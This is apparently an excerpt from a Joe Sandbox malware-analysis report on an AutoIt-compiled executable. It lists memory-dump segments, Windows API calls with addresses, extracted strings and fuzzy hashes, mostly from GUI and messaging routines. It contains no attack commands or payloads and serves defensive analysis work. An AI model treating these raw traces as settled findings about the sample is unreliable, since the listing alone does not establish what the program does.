                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,003EF910), ref: 003E3627
                                                            • IsWindowVisible.USER32(?), ref: 003E364B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 003EA630
                                                            • GetSysColorBrush.USER32(0000000F), ref: 003EA661
                                                            • GetSysColor.USER32(0000000F), ref: 003EA66D
                                                            • SetBkColor.GDI32(?,000000FF), ref: 003EA687
                                                            • SelectObject.GDI32(?,00000000), ref: 003EA696
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 003EA6C1
                                                            • GetSysColor.USER32(00000010), ref: 003EA6C9
                                                            • CreateSolidBrush.GDI32(00000000), ref: 003EA6D0
                                                            • FrameRect.USER32(?,?,00000000), ref: 003EA6DF
                                                            • DeleteObject.GDI32(00000000), ref: 003EA6E6
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 003EA731
                                                            • FillRect.USER32(?,?,00000000), ref: 003EA763
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003EA78E
                                                              • Part of subcall function 003EA8CA: GetSysColor.USER32(00000012), ref: 003EA903
                                                              • Part of subcall function 003EA8CA: SetTextColor.GDI32(?,?), ref: 003EA907
                                                              • Part of subcall function 003EA8CA: GetSysColorBrush.USER32(0000000F), ref: 003EA91D
                                                              • Part of subcall function 003EA8CA: GetSysColor.USER32(0000000F), ref: 003EA928
                                                              • Part of subcall function 003EA8CA: GetSysColor.USER32(00000011), ref: 003EA945
                                                              • Part of subcall function 003EA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003EA953
                                                              • Part of subcall function 003EA8CA: SelectObject.GDI32(?,00000000), ref: 003EA964
                                                              • Part of subcall function 003EA8CA: SetBkColor.GDI32(?,00000000), ref: 003EA96D
                                                              • Part of subcall function 003EA8CA: SelectObject.GDI32(?,?), ref: 003EA97A
                                                              • Part of subcall function 003EA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 003EA999
                                                              • Part of subcall function 003EA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003EA9B0
                                                              • Part of subcall function 003EA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 003EA9C5
                                                              • Part of subcall function 003EA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003EA9ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?), ref: 00362CA2
                                                            • DeleteObject.GDI32(00000000), ref: 00362CE8
                                                            • DeleteObject.GDI32(00000000), ref: 00362CF3
                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00362CFE
                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00362D09
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0039C43B
                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0039C474
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0039C89D
                                                              • Part of subcall function 00361B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00362036,?,00000000,?,?,?,?,003616CB,00000000,?), ref: 00361B9A
                                                            • SendMessageW.USER32(?,00001053), ref: 0039C8DA
                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0039C8F1
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0039C907
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0039C912
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                            • String ID: 0
                                                            • API String ID: 464785882-4108050209
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 003D74DE
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003D759D
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003D75DB
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003D75ED
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 003D7633
                                                            • GetClientRect.USER32(00000000,?), ref: 003D763F
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 003D7683
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003D7692
                                                            • GetStockObject.GDI32(00000011), ref: 003D76A2
                                                            • SelectObject.GDI32(00000000,00000000), ref: 003D76A6
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003D76B6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003D76BF
                                                            • DeleteDC.GDI32(00000000), ref: 003D76C8
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003D76F4
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 003D770B
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 003D7746
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003D775A
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 003D776B
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 003D779B
                                                            • GetStockObject.GDI32(00000011), ref: 003D77A6
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003D77B1
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003D77BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 003CAD1E
                                                            • GetDriveTypeW.KERNEL32(?,003EFAC0,?,\\.\,003EF910), ref: 003CADFB
                                                            • SetErrorMode.KERNEL32(00000000,003EFAC0,?,\\.\,003EF910), ref: 003CAF59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003E9AD2
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003E9B8B
                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 003E9BA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: 0
                                                            • API String ID: 2326795674-4108050209
                                                            • Opcode ID: a5c02333a722404dd9d25d6b1a0ab9d01708d2be18c851d687a039b8272843c1
                                                            • Instruction ID: f652ae33a2dff04b3136a72607b81b3e7dbc169f982711e044422d8b7586a9e6
                                                            • Opcode Fuzzy Hash: a5c02333a722404dd9d25d6b1a0ab9d01708d2be18c851d687a039b8272843c1
                                                            • Instruction Fuzzy Hash: 5902D2301042A1AFD726CF16C885BAABBE9FF89300F04872EF595DA2E1C775D945CB51
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 003EA903
                                                            • SetTextColor.GDI32(?,?), ref: 003EA907
                                                            • GetSysColorBrush.USER32(0000000F), ref: 003EA91D
                                                            • GetSysColor.USER32(0000000F), ref: 003EA928
                                                            • CreateSolidBrush.GDI32(?), ref: 003EA92D
                                                            • GetSysColor.USER32(00000011), ref: 003EA945
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003EA953
                                                            • SelectObject.GDI32(?,00000000), ref: 003EA964
                                                            • SetBkColor.GDI32(?,00000000), ref: 003EA96D
                                                            • SelectObject.GDI32(?,?), ref: 003EA97A
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 003EA999
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003EA9B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 003EA9C5
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003EA9ED
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003EAA14
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 003EAA32
                                                            • DrawFocusRect.USER32(?,?), ref: 003EAA3D
                                                            • GetSysColor.USER32(00000011), ref: 003EAA4B
                                                            • SetTextColor.GDI32(?,00000000), ref: 003EAA53
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003EAA67
                                                            • SelectObject.GDI32(?,003EA5FA), ref: 003EAA7E
                                                            • DeleteObject.GDI32(?), ref: 003EAA89
                                                            • SelectObject.GDI32(?,?), ref: 003EAA8F
                                                            • DeleteObject.GDI32(?), ref: 003EAA94
                                                            • SetTextColor.GDI32(?,?), ref: 003EAA9A
                                                            • SetBkColor.GDI32(?,?), ref: 003EAAA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: 74f7a3357eae812d39fab1f2682ab6901f1d74ca7c691bf4fc230b653cc192bc
                                                            • Instruction ID: 50d1458001a82b424cee2a74a2b1d6dea80c7ad36ca65aa070025a3583d1a12d
                                                            • Opcode Fuzzy Hash: 74f7a3357eae812d39fab1f2682ab6901f1d74ca7c691bf4fc230b653cc192bc
                                                            • Instruction Fuzzy Hash: 7F514D71900658EFDF229FA5DC88EAE7B79EB48320F114225F911AB2E1D7B1A940DF50
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003E8AC1
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E8AD2
                                                            • CharNextW.USER32(0000014E), ref: 003E8B01
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003E8B42
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003E8B58
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E8B69
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003E8B86
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 003E8BD8
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003E8BEE
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 003E8C1F
                                                            • _memset.LIBCMT ref: 003E8C44
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003E8C8D
                                                            • _memset.LIBCMT ref: 003E8CEC
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003E8D16
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 003E8D6E
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 003E8E1B
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 003E8E3D
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003E8E87
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003E8EB4
                                                            • DrawMenuBar.USER32(?), ref: 003E8EC3
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 003E8EEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: 8c718192141e7a960c957a81fbe5b805c49972cfe2922d5c219fa50c69f8fd03
                                                            • Instruction ID: 9c01809681362f92dc6fd8ee9f62f50fadf93a971d1c08ae04aa98e3226b9e81
                                                            • Opcode Fuzzy Hash: 8c718192141e7a960c957a81fbe5b805c49972cfe2922d5c219fa50c69f8fd03
                                                            • Instruction Fuzzy Hash: ECE183709002A8AFDF22DF51DC84EEE7B79EF05710F118266F919AA1D0DB709A81DF60
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 003E49CA
                                                            • GetDesktopWindow.USER32 ref: 003E49DF
                                                            • GetWindowRect.USER32(00000000), ref: 003E49E6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003E4A48
                                                            • DestroyWindow.USER32(?), ref: 003E4A74
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003E4A9D
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003E4ABB
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003E4AE1
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 003E4AF6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003E4B09
                                                            • IsWindowVisible.USER32(?), ref: 003E4B29
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003E4B44
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003E4B58
                                                            • GetWindowRect.USER32(?,?), ref: 003E4B70
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 003E4B96
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 003E4BB0
                                                            • CopyRect.USER32(?,?), ref: 003E4BC7
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 003E4C32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: af2ae4cbb0ba1d5d0e821e0bd1127f867138a35df030712ffe13fa4f56c1a66e
                                                            • Instruction ID: e6f3e9d43c9eb8eb0b8c7b7e2224a475f0739ef4e9b977f5debd5132f856826b
                                                            • Opcode Fuzzy Hash: af2ae4cbb0ba1d5d0e821e0bd1127f867138a35df030712ffe13fa4f56c1a66e
                                                            • Instruction Fuzzy Hash: 13B19C70604390AFDB15DF65C884B6ABBE8FF88310F008A2DF5999B2A1D771EC05CB55
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003C44AC
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003C44D2
                                                            • _wcscpy.LIBCMT ref: 003C4500
                                                            • _wcscmp.LIBCMT ref: 003C450B
                                                            • _wcscat.LIBCMT ref: 003C4521
                                                            • _wcsstr.LIBCMT ref: 003C452C
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003C4548
                                                            • _wcscat.LIBCMT ref: 003C4591
                                                            • _wcscat.LIBCMT ref: 003C4598
                                                            • _wcsncpy.LIBCMT ref: 003C45C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: 2552e99d058539fdf8935676dff76d13b8911ab0b9afe4c86890c1b196ffa821
                                                            • Instruction ID: 66dccd518503e8a3bb17d9a3c42b9d48fedf45802a5dbfe21d7177ebccc87acf
                                                            • Opcode Fuzzy Hash: 2552e99d058539fdf8935676dff76d13b8911ab0b9afe4c86890c1b196ffa821
                                                            • Instruction Fuzzy Hash: 2941D371A003007BDB17BA748C42FBF776CDF42710F1005AAF905EA1C2EA74AA0197A9
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003628BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 003628C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003628EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 003628F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 0036291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00362939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00362949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0036297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00362990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 003629AE
                                                            • GetStockObject.GDI32(00000011), ref: 003629CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 003629D5
                                                              • Part of subcall function 00362344: GetCursorPos.USER32(?), ref: 00362357
                                                              • Part of subcall function 00362344: ScreenToClient.USER32(004257B0,?), ref: 00362374
                                                              • Part of subcall function 00362344: GetAsyncKeyState.USER32(00000001), ref: 00362399
